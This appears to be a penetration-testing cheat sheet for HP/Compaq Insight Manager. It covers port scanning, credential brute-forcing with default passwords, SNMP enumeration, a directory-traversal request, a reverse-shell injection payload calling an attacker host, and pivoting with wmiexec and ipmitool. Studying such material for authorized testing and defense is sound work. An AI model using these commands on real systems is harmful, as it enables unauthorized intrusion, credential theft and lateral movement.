Compaq HP Insight Manager - Port 2301, 2381

Basic info

HP Insight Manager, formerly known as Compaq Insight Manager (CIM), is a system management tool designed to monitor the hardware and status of HP servers and networking devices. It often exposes web interfaces, SNMP services, and other control endpoints that are prone to vulnerabilities, especially in outdated deployments. Attackers can leverage these weaknesses for unauthorized access, network reconnaissance, and privilege escalation.

Detecting HP Insight Manager Services in Network Scans

Nmap Fingerprinting and Banner Grabbing

To identify hosts running HP Insight Manager, scan for known ports:

nmap -p 2301,2381 -sV -T4 <target-ip>

Expected output:

• TCP 2301 – HTTP interface (Compaq Insight Manager)

• TCP 2381 – HTTPS interface (HP System Management Homepage)

Check for known signatures like:

Compaq HTTP Server
HP System Management Homepage

Web Interface Enumeration and Vulnerability Mapping

HTTP/HTTPS Portal Access

Access via browser:

• http://<target-ip>:2301

• https://<target-ip>:2381

Inspect for:

• Login portal

• Firmware versions

• Server model identifiers

• System status panels

Use automated tools to brute-force credentials and enumerate hidden endpoints:

hydra -l Administrator -P passwords.txt <target-ip> http-get /index.htm

Check for default credentials such as:

• Administrator:admin

• admin:admin

• root:compaq

SNMP Enumeration on Insight Manager-Enabled Devices

SNMP Public Community String Access

Run the following:

snmpwalk -v 1 -c public <target-ip>

Commonly exposed information:

• Server model and serial

• Operating system and software versions

• Installed hardware (disks, memory, CPU)

• Active interfaces and IPs

• Logged-in users

Check for access via:

onesixtyone -c community.txt <target-ip>

If default strings like public, private, or compaq work, escalate to full reconnaissance or pivoting.

Leveraging Known CVEs Against HP Insight Manager

Historical Vulnerabilities

1. CVE-2004-0658 – Buffer Overflow in HTTP service on port 2301 (Compaq Insight Manager)

   • Can be exploited to crash the service or potentially execute remote code.

2. CVE-2007-4044 – Directory traversal in HP System Management Homepage (<=2.1.9)

   • Exploitable via ../../../ in URL paths.

Example request:

GET /cgi-bin/../../../windows/win.ini HTTP/1.0
Host: <target-ip>:2301

1. CVE-2009-4187 – XSS vulnerability in system homepage

   • Used for persistent admin session hijack or phishing within the local network.

Check version in the page footer or in /hpdiags/hpdiags.xml.

Gaining Access Through Misconfigurations

File Disclosure via Web Interface

Use DirBuster or ffuf:

ffuf -u http://<target-ip>:2301/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

Look for accessible paths like:

• /hpdiags/

• /compaq/

• /logs/

• /config/

• /system/

These may expose backup files, logs with credentials, or full configuration exports.

Exploiting Administrative Interfaces for Command Execution

Remote Command Injection (Older Firmware)

If the system allows hardware control (e.g., fan speed, reboots) via HTTP endpoints, inspect POST requests with tools like Burp Suite.

Inject:

; nc -e /bin/sh <attacker-ip> 4444

Or:

| powershell -EncodedCommand <payload>

Look for parameters in URLs or forms like:

• /set_config.cgi

• /change_settings.cgi

• /run_task.cgi

Gaining Lateral Movement from Insight Manager Systems

Insight Manager systems often reside on privileged segments and interact with:

• Active Directory for authentication

• IPMI/iLO for hardware management

• Other HP management suites via SNMP and WMI

Dump credentials from accessible pages or captured traffic, then pivot using:

wmiexec.py domain/user:password@<target>

Or extract stored iLO/IPMI credentials and reuse them:

ipmitool -I lanplus -H <target> -U admin -P password chassis power status